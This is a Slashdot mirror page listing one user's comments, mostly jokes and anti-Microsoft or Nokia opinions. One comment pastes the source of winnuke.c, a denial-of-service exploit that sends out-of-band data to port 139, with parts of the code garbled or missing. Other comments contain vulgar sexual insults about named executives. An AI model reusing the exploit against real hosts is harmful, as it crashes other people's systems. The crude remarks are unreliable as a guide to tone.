Slashdot Mirror


User: kurt555gs

kurt555gs's activity in the archive.

Stories
0
Comments
915
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 915

  1. Re:What would I like to see at CES? on Slashdot Asks: What would you like to see at CES? · · Score: 1

    I held a grudge against John Wayne Gacy for a long time too. Yes, it's appropriate.

  2. Re:What would I like to see at CES? on Slashdot Asks: What would you like to see at CES? · · Score: 1

    I was being politically correct.

  3. What would I like to see at CES? on Slashdot Asks: What would you like to see at CES? · · Score: 5, Funny

    Bill Gates, Steve Balmer, and that Elop character in a dollar per throw dunk tank filled with ice water.

  4. Fools! on Supercomputer Repossessed By State, May Be Sold In Pieces · · Score: 5, Funny

    Think of how many Bitcoins this thing could make. Someone should tell New Mexico.

  5. You suck at coding bro. Every consider a job in the fast food or hospitality industries?

  6. I have an N9 on Nokia N9: the World's Most Underrated Smartphone? · · Score: 2

    It;s wonderful. The interface is the best that has ever been made. Sad to see innovation die with Nokia.

  7. Why? on Kazakhstan Wants Russia To Hand Over Their Baikonur Space City · · Score: 1

    It was silly to give Kazakhstan independence in the first place.

    What would Stalin have done?

  8. Chromebook! on The Trouble With Bringing Your Business Laptop To China · · Score: 1

    Nothing else to say.

  9. Bag limit? on Iran Claims To Have Downed Another US Drone · · Score: 2

    Isn't it drone season over there?

  10. Could be worse on North Korea Claims Archaeologists Have Found 'Unicorn Lair' In Pyongyang · · Score: 1

    Could be more of the recent obviously paid Microsoft asrtoturfing here.

  11. I had to. on Raspberry Pi's $25 Model A Hits Production Line · · Score: 2

    Can you imagine a Beowulf cluster of these?

    Sorry.

  12. Re:Surprised? on Dell's Ubuntu Ultrabook Now On Sale; Costs $50 More Than Windows Version · · Score: 1

    I'm not surprised at all. Michael Dell is used to having Balmer's cock "more than a comfortable depth" in his mouth. M$ got their tax and Balmer made him charge more just because it's Linux.
     

  13. Very Microsoft of them on Nokia Asks Court To Block RIM Products For Violating Patent Agreement · · Score: 2

    No more innovation! Law suits are the way of the future!

  14. It's name is: on Probable Rogue Planet Spotted · · Score: 1

    Mongo! Ming is coming!

  15. Good for Motorola. on Motorola Wants 2.25% of Microsoft's Surface Revenue · · Score: 2

    Microsoft has devolved into a corporate raider (Nokia) and patent troll. (HTC, et al). A little of their own medicine is good for them.

  16. Oh really? on NY Attorney General Subpoenas Craigslist For Post-Sandy Price Gougers · · Score: 3, Insightful

    And how about pharmaceutical companies that charge $1000s for pills that cost less than the plastic bottle they come in? Want real price gauging?

  17. GMO chips on ARM, Microsoft Collaborating On 64-bit Windows Version · · Score: 0

    Mutated ARM processors to work with Windows just like Monsanto's Roundup Ready corn. It's about control of the market not advance in science. Looks like Microsoft is as evil as ever.

  18. Re:economics 101 on Nexus 7 and Android Convertibles Drive Massive Asus Profit · · Score: 1

    Telle that to Nokia's former Maemo bunch.

  19. It's a trap. on Apple CEO Likens Surface To Car That Flies, Floats · · Score: 2

    The ARM Surface isn't really designed to be a real product. In true Microsoft style it's job is two fold. First, to waste time and keep the M$ faithful from buying an iPad or Android tablet unti the Intel Version of the Surface is ready for production. Secondly, and even more importantly it will allow Microsoft to force ARM tablet manufacturers into paying the famous Microsoft Tax on all tablets they produce or face the wrath ans usual sanctions.

    The developers, and "consumers" that buy Windows RT are just cannon fodder.

  20. I like IKE! on Third 2012 US Presidential Debate Tonight: Discuss Here · · Score: 1

    Hey, Missouri elected a dead guy for Senator .... http://www.youtube.com/watch?v=nG4IX5jBc4Q

  21. It's a trap on Windows RT vs. Windows 8 Could Burn Consumers · · Score: 4, Interesting

    Windows RT is just there to make things difficult for Android table makers. The "consumers" that buy them are merely colateral damage.

  22. THX1138 on The New School Nurse Is Nurse Ratched · · Score: 3, Insightful

    Really! They made a movie about this.

  23. I was a Nokia Fanboi on The Story of Nokia MeeGo · · Score: 1

    I have had innumerable Nokia phones going back to the Radio Shack branded Nokia hand held in the 80's. I especially like Maemo. I have an N770, N800, N900, and an N9.

    I have also had a lot of Symbian phones. the best being my N95, and the worst of all the N97. I have an N8 which is a nice phone with a great camera, and an N808 Pureview which is a great camera infected with Symbian Belle which is flaky as hell.

    I won my N900 as a door prize at the chicago Nokia store launch. Wow!

    I just bought a Nokia Asha 311 to play with, and at least Symbian S40 is stable. Actually Symbian S40 at 1Ghz is fucking awesome.

    I think many here have it wrong. The N9 was beautiful and would have sold well if it had corporate support. I also think Microsoft's main goal is to contractually tie up Nokia, then drive the stock price to the basement and pick up bargin maps and patents. I think that was the plan all along.

    Nokia was the last phone company to make the handsets for the customers. All the other make them for consumers with spyware and ad injected bloatware.

    End of an ERA.

  24. Kinda reminds me of this on Lone Packet Crashes Telco Networks · · Score: 1

    /* winnuke.c - (05/07/97) By _eci */ /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */

    #include
    #include
    #include
    #include
    #include
    #include
    #include

    #define dport 139 /* Attack port: 139 is what we want */

    int x, s;
    char *str = "Bye"; /* Makes no diff */
    struct sockaddr_in addr, spoofedaddr;
    struct hostent *host;

    int open_sock(int sock, char *server, int port) {
              struct sockaddr_in blah;
              struct hostent *he;
              bzero((char *)&blah,sizeof(blah));
              blah.sin_family=AF_INET;
              blah.sin_addr.s_addr=inet_addr(server);
              blah.sin_port=htons(port);

            if ((he = gethostbyname(server)) != NULL) {
                    bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
            }
            else {
                      if ((blah.sin_addr.s_addr = inet_addr(server)) \n",argv[0]);
                  exit(0);
              }

              if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
                    perror("socket()");
                    exit(-1);
              }

              open_sock(s,argv[1],dport);

              printf("Sending crash... ");
                  send(s,str,strlen(str),MSG_OOB);
                  usleep(100000);
              printf("Done!\n");
              close(s);
    }

  25. Really want an answer? on Ask Slashdot: Best Approach To Reenergize an Old Programmer? · · Score: 1

    The best way to reenergize and old programmer is a Korean massage with a "Happy Ending".

    You asked.